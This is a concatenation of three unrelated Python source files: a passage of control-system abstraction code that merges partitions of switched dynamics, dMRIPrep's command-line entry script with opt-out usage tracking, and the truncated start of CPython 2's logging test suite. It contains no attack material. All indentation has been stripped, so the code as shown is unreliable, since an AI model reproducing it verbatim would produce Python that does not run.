ofts = trs.FTS()
adj = sp.lil_matrix(transitions.T)
n = adj.shape[0]
ofts_states = range(n)
ofts.states.add_from(ofts_states)
ofts.transitions.add_adj(adj, ofts_states)
# Decorate TS with state labels
atomic_propositions = set(part.prop_regions)
ofts.atomic_propositions.add_from(atomic_propositions)
for state, region in zip(ofts_states, sol):
state_prop = region.props.copy()
ofts.states.add(state, ap=state_prop)
param = {
'N':N,
'trans_length':trans_length,
'closed_loop':closed_loop,
'conservative':conservative,
'use_all_horizon':use_all_horizon,
'min_cell_volume':min_cell_volume,
'max_num_poly':max_num_poly
}
ppp2orig = [part2orig[x] for x in orig]
end_time = os.times()[0]
msg = 'Total abstraction time: {t} [sec]'.format(
t=end_time - start_time)
print(msg)
logger.info(msg)
if save_img and plt is not None:
fig, ax = plt.subplots(1, 1)
plt.plot(progress)
ax.set_xlabel('iteration')
ax.set_ylabel('progress ratio')
ax.figure.savefig('progress.pdf')
return AbstractPwa(
ppp=new_part,
ts=ofts,
ppp2ts=ofts_states,
pwa=ssys,
pwa_ppp=part,
ppp2pwa=orig,
ppp2sys=subsys_list,
orig_ppp=orig_ppp,
ppp2orig=ppp2orig,
disc_params=param
)
def reachable_within(trans_length, adj_k, adj):
"""Find cells reachable within trans_length hops.
"""
if trans_length <= 1:
return adj_k
k = 1
while k < trans_length:
adj_k = (np.dot(adj_k, adj)!=0).astype(int)
k += 1
adj_k = (adj_k > 0).astype(int)
return adj_k
def sym_adj_change(IJ, adj_k, transitions, i):
horizontal = adj_k[i, :] -transitions[i, :] > 0
vertical = adj_k[:, i] -transitions[:, i] > 0
IJ[i, :] = horizontal.astype(int)
IJ[:, i] = vertical.astype(int)
# DEFUNCT until further notice
def discretize_overlap(closed_loop=False, conservative=False):
"""default False.
UNDER DEVELOPMENT; function signature may change without notice.
Calling will result in NotImplementedError.
"""
raise NotImplementedError
#
# if rdiff < abs_tol:
# logger.info("Transition found")
# transitions[i,j] = 1
#
# elif ((vol1 > min_cell_volume) & (risect > rd) &
# (num_new_reg[i] <= num_orig_neigh[i]+1)):
#
# # Make sure new cell is Region and add proposition lists
# if len(isect) == 0:
# isect = pc.Region([isect], si.props)
# else:
# isect.props = si.props.copy()
#
# # Add new state
# sol.append(isect)
# size = len(sol)
#
# # Add transitions
# transitions = np.hstack([transitions, np.zeros([size - 1, 1],
# dtype=int) ])
# transitions = np.vstack([transitions, np.zeros([1, size],
# dtype=int) ])
#
# # All sets reachable from orig cell are reachable from both cells
# transitions[size-1,:] = transitions[i,:]
# transitions[size-1,j] = 1 # j is reachable from new cell
#
# # Take care of adjacency
# old_adj = np.nonzero(adj[i,:])[0]
#
# adj = np.hstack([adj, np.zeros([size - 1, 1], dtype=int) ])
# adj = np.vstack([adj, np.zeros([1, size], dtype=int) ])
# adj[i,size-1] = 1
# adj[size-1,i] = 1
# adj[size-1,size-1] = 1
#
# for k in np.setdiff1d(old_adj,[i,size-1]):
# if pc.is_adjacent(sol[size-1],sol[k],overlap=True):
# adj[size-1,k] = 1
# adj[k, size-1] = 1
# else:
# # Actively remove (valid) transitions between non-neighbors
# transitions[size-1,k] = 0
# transitions[k,size-1] = 0
#
# # Assign original proposition cell to new state and update counts
# if not conservative:
# orig = np.hstack([orig, orig[i]])
# print(num_new_reg)
# num_new_reg = np.hstack([num_new_reg, 0])
# num_orig_neigh = np.hstack([num_orig_neigh, np.sum(adj[size-1,:])-1])
#
# logger.info("\n Adding state " + str(size-1) + "\n")
#
# # Just add adjacent cells for checking,
# # unless transition already found
# IJ = np.hstack([IJ, np.zeros([size - 1, 1], dtype=int) ])
# IJ = np.vstack([IJ, np.zeros([1, size], dtype=int) ])
# horiz2 = adj[size-1,:] - transitions[size-1,:] > 0
# verti2 = adj[:,size-1] - transitions[:,size-1] > 0
# IJ[size-1,:] = horiz2.astype(int)
# IJ[:,size-1] = verti2.astype(int)
# else:
# logger.info("No transition found, intersect vol: " + str(vol1) )
# transitions[i,j] = 0
#
# new_part = PropPreservingPartition(
# domain=part.domain,
# regions=sol, adj=np.array([]),
# trans=transitions, prop_regions=part.prop_regions,
# original_regions=orig_list, orig=orig)
# return new_part
def multiproc_discretize(q, mode, ppp, cont_dyn, disc_params):
global logger
logger = mp.log_to_stderr()
name = mp.current_process().name
print('Abstracting mode: ' + str(mode) + ', on: ' + str(name))
absys = discretize(ppp, cont_dyn, **disc_params)
q.put((mode, absys))
print('Worker: ' + str(name) + 'finished.')
def multiproc_get_transitions(
q, absys, mode, ssys, params
):
global logger
logger = mp.log_to_stderr()
name = mp.current_process().name
print('Merged transitions for mode: ' + str(mode) + ', on: ' + str(name))
trans = get_transitions(absys, mode, ssys, **params)
q.put((mode, trans))
print('Worker: ' + str(name) + 'finished.')
def multiproc_discretize_switched(
ppp, hybrid_sys, disc_params=None,
plot=False, show_ts=False, only_adjacent=True
):
"""Parallel implementation of discretize_switched.
Uses the multiprocessing package.
"""
logger.info('parallel discretize_switched started')
modes = list(hybrid_sys.modes)
mode_nums = hybrid_sys.disc_domain_size
q = mp.Queue()
mode_args = dict()
for mode in modes:
cont_dyn = hybrid_sys.dynamics[mode]
mode_args[mode] = (q, mode, ppp, cont_dyn, disc_params[mode])
jobs = [mp.Process(target=multiproc_discretize, args=args)
for args in mode_args.values()]
for job in jobs:
job.start()
# flush before join:
# http://stackoverflow.com/questions/19071529/
abstractions = dict()
for job in jobs:
mode, absys = q.get()
abstractions[mode] = absys
for job in jobs:
job.join()
# merge their domains
(merged_abstr, ap_labeling) = merge_partitions(abstractions)
n = len(merged_abstr.ppp)
logger.info('Merged partition has: ' + str(n) + ', states')
# find feasible transitions over merged partition
for mode in modes:
cont_dyn = hybrid_sys.dynamics[mode]
params = disc_params[mode]
mode_args[mode] = (q, merged_abstr, mode, cont_dyn, params)
jobs = [mp.Process(target=multiproc_get_transitions, args=args)
for args in mode_args.values()]
for job in jobs:
job.start()
trans = dict()
for job in jobs:
mode, t = q.get()
trans[mode] = t
# merge the abstractions, creating a common TS
merge_abstractions(merged_abstr, trans,
abstractions, modes, mode_nums)
if plot:
plot_mode_partitions(merged_abstr, show_ts, only_adjacent)
return merged_abstr
def discretize_switched(
ppp, hybrid_sys, disc_params=None,
plot=False, show_ts=False, only_adjacent=True
):
"""Abstract switched dynamics over given partition.
@type ppp: L{PropPreservingPartition}
@param hybrid_sys: dynamics of switching modes
@type hybrid_sys: L{SwitchedSysDyn}
@param disc_params: discretization parameters passed to L{discretize} for
each mode. See L{discretize} for details.
@type disc_params: dict (keyed by mode) of dicts.
@param plot: save partition images
@type plot: bool
@param show_ts, only_adjacent: options for L{AbstractPwa.plot}.
@return: abstracted dynamics,
some attributes are dict keyed by mode
@rtype: L{AbstractSwitched}
"""
if disc_params is None:
disc_params = {'N':1, 'trans_length':1}
logger.info('discretizing hybrid system')
modes = list(hybrid_sys.modes)
mode_nums = hybrid_sys.disc_domain_size
# discretize each abstraction separately
abstractions = dict()
for mode in modes:
logger.debug(30*'-'+'\n')
logger.info('Abstracting mode: ' + str(mode))
cont_dyn = hybrid_sys.dynamics[mode]
absys = discretize(
ppp, cont_dyn,
**disc_params[mode]
)
logger.debug('Mode Abstraction:\n' + str(absys) +'\n')
abstractions[mode] = absys
# merge their domains
(merged_abstr, ap_labeling) = merge_partitions(abstractions)
n = len(merged_abstr.ppp)
logger.info('Merged partition has: ' + str(n) + ', states')
# find feasible transitions over merged partition
trans = dict()
for mode in modes:
cont_dyn = hybrid_sys.dynamics[mode]
params = disc_params[mode]
trans[mode] = get_transitions(
merged_abstr, mode, cont_dyn,
N=params['N'], trans_length=params['trans_length']
)
# merge the abstractions, creating a common TS
merge_abstractions(merged_abstr, trans,
abstractions, modes, mode_nums)
if plot:
plot_mode_partitions(merged_abstr, show_ts, only_adjacent)
return merged_abstr
def plot_mode_partitions(swab, show_ts, only_adjacent):
"""Save each mode's partition and final merged partition.
"""
axs = swab.plot(show_ts, only_adjacent)
if not axs:
logger.error('failed to plot the partitions.')
return
n = len(swab.modes)
assert(len(axs) == 2*n)
# annotate
for ax in axs:
plot_annot(ax)
# save mode partitions
for ax, mode in zip(axs[:n], swab.modes):
fname = 'merged_' + str(mode) + '.pdf'
ax.figure.savefig(fname)
# save merged partition
for ax, mode in zip(axs[n:], swab.modes):
fname = 'part_' + str(mode) + '.pdf'
ax.figure.savefig(fname)
def plot_annot(ax):
fontsize = 5
for tick in ax.xaxis.get_major_ticks():
tick.label1.set_fontsize(fontsize)
for tick in ax.yaxis.get_major_ticks():
tick.label1.set_fontsize(fontsize)
ax.set_xlabel('$v_1$', fontsize=fontsize+6)
ax.set_ylabel('$v_2$', fontsize=fontsize+6)
def merge_abstractions(merged_abstr, trans, abstr, modes, mode_nums):
"""Construct merged transitions.
@type merged_abstr: L{AbstractSwitched}
@type abstr: dict of L{AbstractPwa}
"""
# TODO: check equality of atomic proposition sets
aps = abstr[modes[0]].ts.atomic_propositions
logger.info('APs: ' + str(aps))
sys_ts = trs.FTS()
# create stats
n = len(merged_abstr.ppp)
states = range(n)
sys_ts.states.add_from(states)
sys_ts.atomic_propositions.add_from(aps)
# copy AP labels from regions to discrete states
ppp2ts = states
for (i, state) in enumerate(ppp2ts):
props = merged_abstr.ppp[i].props
sys_ts.states[state]['ap'] = props
# create mode actions
sys_actions = [str(s) for e,s in modes]
env_actions = [str(e) for e,s in modes]
# no env actions ?
if mode_nums[0] == 0:
actions_per_mode = {
(e,s):{'sys_actions':str(s)}
for e,s in modes
}
sys_ts.sys_actions.add_from(sys_actions)
elif mode_nums[1] == 0:
# no sys actions
actions_per_mode = {
(e,s):{'env_actions':str(e)}
for e,s in modes
}
sys_ts.env_actions.add_from(env_actions)
else:
actions_per_mode = {
(e,s):{'env_actions':str(e), 'sys_actions':str(s)}
for e,s in modes
}
sys_ts.env_actions.add_from([str(e) for e,s in modes])
sys_ts.sys_actions.add_from([str(s) for e,s in modes])
for mode in modes:
env_sys_actions = actions_per_mode[mode]
adj = trans[mode]
sys_ts.transitions.add_adj(
adj = adj,
adj2states = states,
**env_sys_actions
)
merged_abstr.ts = sys_ts
merged_abstr.ppp2ts = ppp2ts
def get_transitions(
abstract_sys, mode, ssys, N=10,
closed_loop=True,
trans_length=1
):
"""Find which transitions are feasible in given mode.
Used for the candidate transitions of the merged partition.
@rtype: scipy.sparse.lil_matrix
"""
logger.info('checking which transitions remain feasible after merging')
part = abstract_sys.ppp
# Initialize matrix for pairs to check
IJ = part.adj.copy()
if trans_length > 1:
k = 1
while k < trans_length:
IJ = np.dot(IJ, part.adj)
k += 1
IJ = (IJ > 0).astype(int)
# Initialize output
n = len(part)
transitions = sp.lil_matrix((n, n), dtype=int)
# Do the abstraction
n_checked = 0
n_found = 0
while np.sum(IJ) > 0:
n_checked += 1
ind = np.nonzero(IJ)
i = ind[1][0]
j = ind[0][0]
IJ[j,i] = 0
logger.debug('checking transition: ' + str(i) + ' -> ' + str(j))
si = part[i]
sj = part[j]
# Use original cell as trans_set
trans_set = abstract_sys.ppp2pwa(mode, i)[1]
active_subsystem = abstract_sys.ppp2sys(mode, i)[1]
trans_feasible = is_feasible(
si, sj, active_subsystem, N,
closed_loop = closed_loop,
trans_set = trans_set
)
if trans_feasible:
transitions[i, j] = 1
msg = '\t Feasible transition.'
n_found += 1
else:
transitions[i, j] = 0
msg = '\t Not feasible transition.'
logger.debug(msg)
logger.info('Checked: ' + str(n_checked))
logger.info('Found: ' + str(n_found))
assert n_checked != 0, 'would divide '
logger.info('Survived merging: ' + str(float(n_found) / n_checked) + ' % ')
return transitions
def multiproc_merge_partitions(abstractions):
"""LOGTIME in #processors parallel merging.
Assuming sufficient number of processors.
UNDER DEVELOPMENT; function signature may change without notice.
Calling will result in NotImplementedError.
"""
raise NotImplementedError
def merge_partitions(abstractions):
"""Merge multiple abstractions.
@param abstractions: keyed by mode
@type abstractions: dict of L{AbstractPwa}
@return: (merged_abstraction, ap_labeling)
where:
- merged_abstraction: L{AbstractSwitched}
- ap_labeling: dict
"""
if len(abstractions) == 0:
warnings.warn('Abstractions empty, nothing to merge.')
return
# consistency check
for ab1 in abstractions.values():
for ab2 in abstractions.values():
p1 = ab1.ppp
p2 = ab2.ppp
if p1.prop_regions != p2.prop_regions:
msg = 'merge: partitions have different sets '
msg += 'of continuous propositions'
raise Exception(msg)
if (
not (p1.domain.A == p2.domain.A).all() or
not (p1.domain.b == p2.domain.b).all()):
raise Exception('merge: partitions have different domains')
# check equality of original PPP partitions
if ab1.orig_ppp == ab2.orig_ppp:
logger.info('original partitions happen to be equal')
init_mode = list(abstractions.keys())[0]
all_modes = set(abstractions)
remaining_modes = all_modes.difference(set([init_mode]))
print('init mode: ' + str(init_mode))
print('all modes: ' + str(all_modes))
print('remaining modes: ' + str(remaining_modes))
# initialize iteration data
prev_modes = [init_mode]
# Create a list of merged-together regions
ab0 = abstractions[init_mode]
regions = list(ab0.ppp)
parents = {init_mode:list(range(len(regions) ))}
ap_labeling = {i:reg.props for i,reg in enumerate(regions)}
for cur_mode in remaining_modes:
ab2 = abstractions[cur_mode]
r = merge_partition_pair(
regions, ab2, cur_mode, prev_modes,
parents, ap_labeling
)
regions, parents, ap_labeling = r
prev_modes += [cur_mode]
new_list = regions
# build adjacency based on spatial adjacencies of
# component abstractions.
# which justifies the assumed symmetry of part1.adj, part2.adj
# Basically, if two regions are either 1) part of the same region in one of
# the abstractions or 2) adjacent in one of the abstractions, then the two
# regions are adjacent in the switched dynamics.
n_reg = len(new_list)
adj = np.zeros([n_reg, n_reg], dtype=int)
for i, reg_i in enumerate(new_list):
for j, reg_j in enumerate(new_list[0:i]):
touching = False
for mode in abstractions:
pi = parents[mode][i]
pj = parents[mode][j]
part = abstractions[mode].ppp
if (part.adj[pi, pj] == 1) or (pi == pj):
touching = True
break
if not touching:
continue
if pc.is_adjacent(reg_i, reg_j):
adj[i,j] = 1
adj[j,i] = 1
adj[i,i] = 1
ppp = PropPreservingPartition(
domain=ab0.ppp.domain,
regions=new_list,
prop_regions=ab0.ppp.prop_regions,
adj=adj
)
abstraction = AbstractSwitched(
ppp=ppp,
modes=abstractions,
ppp2modes=parents,
)
return (abstraction, ap_labeling)
def merge_partition_pair(
old_regions, ab2,
cur_mode, prev_modes,
old_parents, old_ap_labeling
):
"""Merge an Abstraction with the current partition iterate.
@param old_regions: A list of C{Region} that is from either:
1. The ppp of the first (initial) L{AbstractPwa} to be merged.
2. A list of already-merged regions
@type old_regions: list of C{Region}
@param ab2: Abstracted piecewise affine dynamics to be merged into the
@type ab2: L{AbstractPwa}
@param cur_mode: mode to be merged
@type cur_mode: tuple
@param prev_modes: list of modes that have already been merged together
@type prev_modes: list of tuple
@param old_parents: dict of modes that have already been merged to dict of
indices of new regions to indices of regions
@type old_parents: dict of modes to list of region indices in list
C{old_regions} or dict of region indices to regions in original ppp for
that mode
@param old_ap_labeling: dict of states of already-merged modes to sets of
propositions for each state
@type old_ap_labeling: dict of tuples to sets
@return: the following:
- C{new_list}, list of new regions
- C{parents}, same as input param C{old_parents}, except that it
includes the mode that was just merged and for list of regions in
return value C{new_list}
- C{ap_labeling}, same as input param C{old_ap_labeling}, except that it
includes the mode that was just merged.
"""
logger.info('merging partitions')
part2 = ab2.ppp
modes = prev_modes + [cur_mode]
new_list = []
parents = {mode:dict() for mode in modes}
ap_labeling = dict()
for i in range(len(old_regions)):
for j in range(len(part2)):
isect = pc.intersect(old_regions[i],
part2[j])
rc, xc = pc.cheby_ball(isect)
# no intersection ?
if rc < 1e-5:
continue
logger.info('merging region: A' + str(i) +
', with: B' + str(j))
# if Polytope, make it Region
if len(isect) == 0:
isect = pc.Region([isect])
# label the Region with propositions
isect.props = old_regions[i].props.copy()
new_list.append(isect)
idx = new_list.index(isect)
# keep track of parents
for mode in prev_modes:
parents[mode][idx] = old_parents[mode][i]
parents[cur_mode][idx] = j
# union of AP labels from parent states
ap_label_1 = old_ap_labeling[i]
ap_label_2 = ab2.ts.states[j]['ap']
logger.debug('AP label 1: ' + str(ap_label_1))
logger.debug('AP label 2: ' + str(ap_label_2))
# original partitions may be different if pwa_partition used
# but must originate from same initial partition,
# i.e., have same continuous propositions, checked above
#
# so no two intersecting regions can have different AP labels,
# checked here
if ap_label_1 != ap_label_2:
msg = 'Inconsistent AP labels between intersecting regions\n'
msg += 'of partitions of switched system.'
raise Exception(msg)
ap_labeling[idx] = ap_label_1
return new_list, parents, ap_labeling
|
run.py
|
#!/usr/bin/env python
"""dMRI preprocessing workflow."""
from .. import config
def main():
"""Entry point."""
import os
import sys
import gc
from multiprocessing import Process, Manager
from .parser import parse_args
from ..utils.bids import write_derivative_description
parse_args()
popylar = None
if not config.execution.notrack:
import popylar
from ..__about__ import __ga_id__
config.loggers.cli.info(
"Your usage of dmriprep is being recorded using popylar (https://popylar.github.io/). ", # noqa
"For details, see https://nipreps.github.io/dmriprep/usage.html. ",
"To opt out, call dmriprep with a `--notrack` flag")
popylar.track_event(__ga_id__, 'run', 'cli_run')
# CRITICAL Save the config to a file. This is necessary because the execution graph
# is built as a separate process to keep the memory footprint low. The most
# straightforward way to communicate with the child process is via the filesystem.
config_file = config.execution.work_dir / '.dmriprep.toml'
config.to_filename(config_file)
# CRITICAL Call build_workflow(config_file, retval) in a subprocess.
# Because Python on Linux does not ever free virtual memory (VM), running the
# workflow construction jailed within a process preempts excessive VM buildup.
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
retcode = p.exitcode or retval.get('return_code', 0)
dmriprep_wf = retval.get('workflow', None)
# CRITICAL Load the config from the file. This is necessary because the ``build_workflow``
# function executed constrained in a process may change the config (and thus the global
# state of dMRIPrep).
config.load(config_file)
if config.execution.reports_only:
sys.exit(int(retcode > 0))
if dmriprep_wf and config.execution.write_graph:
dmriprep_wf.write_graph(graph2use="colored", format='svg', simple_form=True)
retcode = retcode or (dmriprep_wf is None) * os.EX_SOFTWARE
if retcode != 0:
sys.exit(retcode)
# Generate boilerplate
with Manager() as mgr:
from .workflow import build_boilerplate
p = Process(target=build_boilerplate,
args=(str(config_file), dmriprep_wf))
p.start()
p.join()
if config.execution.boilerplate_only:
sys.exit(int(retcode > 0))
# Clean up master process before running workflow, which may create forks
gc.collect()
if popylar is not None:
popylar.track_event(__ga_id__, 'run', 'started')
config.loggers.workflow.log(15, '\n'.join(
['dMRIPrep config:'] + ['\t\t%s' % s for s in config.dumps().splitlines()])
)
config.loggers.workflow.log(25, 'dMRIPrep started!')
errno = 1 # Default is error exit unless otherwise set
try:
dmriprep_wf.run(**config.nipype.get_plugin())
except Exception as e:
if not config.execution.notrack:
popylar.track_event(__ga_id__, 'run', 'error')
config.loggers.workflow.critical('dMRIPrep failed: %s', e)
raise
else:
config.loggers.workflow.log(25, 'dMRIPrep finished successfully!')
# Bother users with the boilerplate only iff the workflow went okay.
if (config.execution.output_dir / 'dmriprep' / 'logs' / 'CITATION.md').exists():
config.loggers.workflow.log(
25, 'Works derived from this dMRIPrep execution should '
'include the following boilerplate:\n\n%s',
(config.execution.output_dir / 'dmriprep' / 'logs' / 'CITATION.md').read_text()
)
if config.workflow.run_reconall:
from templateflow import api
from niworkflows.utils.misc import _copy_any
dseg_tsv = str(api.get('fsaverage', suffix='dseg', extension=['.tsv']))
_copy_any(dseg_tsv,
str(config.execution.output_dir / 'dmriprep' / 'desc-aseg_dseg.tsv'))
_copy_any(dseg_tsv,
str(config.execution.output_dir / 'dmriprep' / 'desc-aparcaseg_dseg.tsv'))
errno = 0
finally:
from niworkflows.reports import generate_reports
from pkg_resources import resource_filename as pkgrf
# Generate reports phase
failed_reports = generate_reports(
config.execution.participant_label,
config.execution.output_dir,
config.execution.work_dir,
config.execution.run_uuid,
config=pkgrf('dmriprep', 'config/reports-spec.yml'),
packagename='dmriprep')
write_derivative_description(
config.execution.bids_dir,
config.execution.output_dir / 'dmriprep')
if failed_reports and not config.execution.notrack:
popylar.track_event(__ga_id__, 'run', 'reporting_error')
sys.exit(int((errno + failed_reports) > 0))
if __name__ == '__main__':
raise RuntimeError("dmriprep/cli/run.py should not be run directly;\n"
"Please `pip install` dmriprep and use the `dmriprep` command")
|
test_logging.py
|
#!/usr/bin/env python
#
# Copyright 2001-2010 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2010 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import cPickle
import cStringIO
import gc
import json
import os
import re
import select
import socket
from SocketServer import ThreadingTCPServer, StreamRequestHandler
import struct
import sys
import tempfile
from test.test_support import captured_stdout, run_with_locale, run_unittest
import textwrap
import unittest
import warnings
import weakref
try:
import threading
except ImportError:
threading = None
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
finally:
logging._releaseLock()
# Set two unused loggers: one non-ASCII and one Unicode.
# This is to test correct operation when sorting existing
# loggers in the configuration code. See issue 8201.
logging.getLogger("\xab\xd7\xbb")
logging.getLogger(u"\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = cStringIO.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
self.root_logger.addHandler(self.root_hdlr)
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# StringIO.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEquals(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEquals(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warn(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warn (m())
DEB.info (m())
DEB.debug(m())
# These should not log.
ERR.warn(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warn(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warn(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warn(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
